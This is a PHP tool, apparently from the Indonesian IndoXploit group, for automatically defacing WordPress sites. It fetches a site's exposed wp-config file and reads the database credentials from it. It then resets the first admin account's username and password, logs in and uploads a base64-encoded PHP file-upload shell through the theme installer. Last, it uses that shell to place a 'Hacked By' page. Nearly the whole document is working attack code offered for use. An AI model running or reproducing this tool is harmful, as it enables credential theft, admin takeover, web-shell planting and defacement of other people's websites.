Wordpress Auto Deface Melalui link Config.

1. <?php
2. // Tu5b0l3d
3. // thx to: IndoXPloit, HNc
4. // Wordpress Auto Deface Melalui link Config.
5.  
6. error_reporting(0);
7.     if($_POST){
8.  
9.         function ambilKata($param, $kata1, $kata2){
10.     if(strpos($param, $kata1) === FALSE) return FALSE;
11.     if(strpos($param, $kata2) === FALSE) return FALSE;
12.     $start = strpos($param, $kata1) + strlen($kata1);
13.     $end = strpos($param, $kata2, $start);
14.     $return = substr($param, $start, $end - $start);
15.     return $return;
16. }
17.  
18.     function anucurl($sites){
19.         $ch1 = curl_init ("$sites");
20. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
21. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
22. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
23. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
24. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
25. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
26. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
27. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
28. $data = curl_exec ($ch1);
29. return $data;
30.     }
31.  
32.     function lohgin($cek, $web, $userr, $pass, $wp_submit){
33.         $post = array(
34.                     "log" => "$userr",
35.                     "pwd" => "$pass",
36.                     "rememberme" => "forever",
37.                     "wp-submit" => "$wp_submit",
38.                     "redirect_to" => "$web",
39.                     "testcookie" => "1",
40.                     );
41. $ch = curl_init ("$cek");
42. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
43. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
44. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
45. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
46. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
47. curl_setopt ($ch, CURLOPT_POST, 1);
48. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
49. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
50. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
51. $data6 = curl_exec ($ch);
52. return $data6;
53.     }
54.  
55.         $link = $_POST['link'];
56.         $script = $_POST['script'];
57.         if($script==""){
58.             echo "<center><h1>Isi Dulu Hacked By</h1></center>";
59.         }
60.         else{
61.  
62.         $file = anucurl($link);
63.  
64.         $host = ambilkata($file,"DB_HOST', '","'");
65.                     $username = ambilkata($file,"DB_USER', '","'");
66.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
67.                     $db = ambilkata($file,"DB_NAME', '","'");
68.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
69.                     $user_baru = "Tu5b0l3d";
70.                     $password_baru = "Tu5b0l3d";
71.                     $prefix = $db.".".$dbprefix."users";
72.                     $sue = $db.".".$dbprefix."options";
73.                     $pass = md5("$password_baru");
74.                    
75.  
76.  
77.                     echo "# Db Host: $host<br>";
78.                     echo "# Db user: $username<br>";
79.                     echo "# Db Password: $password<br>";
80.                     echo "# Db name: $db<br>";
81.                     echo "# Table_Prefix: $dbprefix<br>";      
82.  
83.         mysql_connect($host,$username,$password);
84.         mysql_select_db($db);
85.  
86.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
87.         $r=mysql_fetch_array($tampil);
88.         $id = $r[ID];
89.  
90.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
91.         $r2=mysql_fetch_array($tampil2);
92.         $target = $r2[option_value];
93.          echo "# $target<br>";
94.        
95.        
96.        
97.  
98.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
99.  
100.  
101.  
102.  
103. $site= "$target/wp-login.php";
104. $site2= "$target/wp-admin/theme-install.php?upload";
105. $b1 = anucurl($site2);
106. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
107. echo "# site2-> $site2\n# wp-submit -> $wp_sub<br>";
108.  
109. $b = lohgin($site, $site2, $user_baru, $password_baru, $wp_sub);
110.  
111. //$b = anucurl($site2);
112.  
113. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
114. echo "# token -> $anu2<br>";
115.  
116.  
117. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
118.  
119. $www = "m.php";
120. $fp5 = fopen($www,"w");
121. fputs($fp5,$upload3);
122.    
123.   $post2 = array(
124.                     "_wpnonce" => "$anu2",
125.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
126.                     "themezip" => "@$www",
127.                     "install-theme-submit" => "Install Now",
128.                     );
129. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
130. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
131. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
132. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
133. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
134. curl_setopt ($ch, CURLOPT_POST, 1);
135. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
136. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
137. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
138. $data3 = curl_exec ($ch);
139.  
140. $y = date("Y");
141. $m = date("m");
142.  
143. $namafile = "id.php";
144. $fpi = fopen($namafile,"w");
145. fputs($fpi,$script);
146.  
147. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
148. curl_setopt($ch6, CURLOPT_POST, true);
149. curl_setopt($ch6, CURLOPT_POSTFIELDS,
150. array('file3'=>"@$namafile"));
151. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
152. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
153. $postResult = curl_exec($ch6);
154. curl_close($ch6);
155.  
156. $as = "$target/k.php";
157. $bs = anucurl($as);
158.  if(preg_match("#hacked#si",$bs)){
159.                         echo "# <font color='green'>berhasil mepes...</font><br>";
160.                         echo "# $as<br>";
161.                        
162.                     }
163.                     else{
164.                         echo "# <font color='red'>gagal mepes...</font><br>";
165.                         echo "# coba aja manual: <br>";
166.                         echo "# $target/wp-login.php<br>";
167.                         echo "# username: $user_baru<br>";
168.                         echo "# password: $password_baru<br>";
169.  
170.                        
171.                     }
172.                 }
173.  
174.  
175.  
176.  
177.     }else{
178.             echo '<html>
179.     <head>
180.         <title>Created By IndoXploit Just For Wordpress</title>
181.     </head>
182.  
183.     <body>
184.             <center>
185.                 <font face="arial"><h2>INDO<font color="red">}{</font>PLOIT <br><br> Wordpress Auto Deface </h2><hr></font>
186.                         <table>
187.                             <tr><td><form method="post" action="?action"></td></tr>
188.                             <tr><td><input type="text" name="link" placeholder="link config"></td></tr>
189.                             <tr><td><input type="text" name="script" placeholder="Hacked By Tu5b0l3d"> //Must Hacked</td></tr>
190.  
191.                             <tr><td><input type="submit" value="Submit"></td></tr>
192.                             </form>
193.                         </table>
194.                        
195.             </center>
196.  
197.     </body>
198. </html>';
199.         }
200.  
201. ?>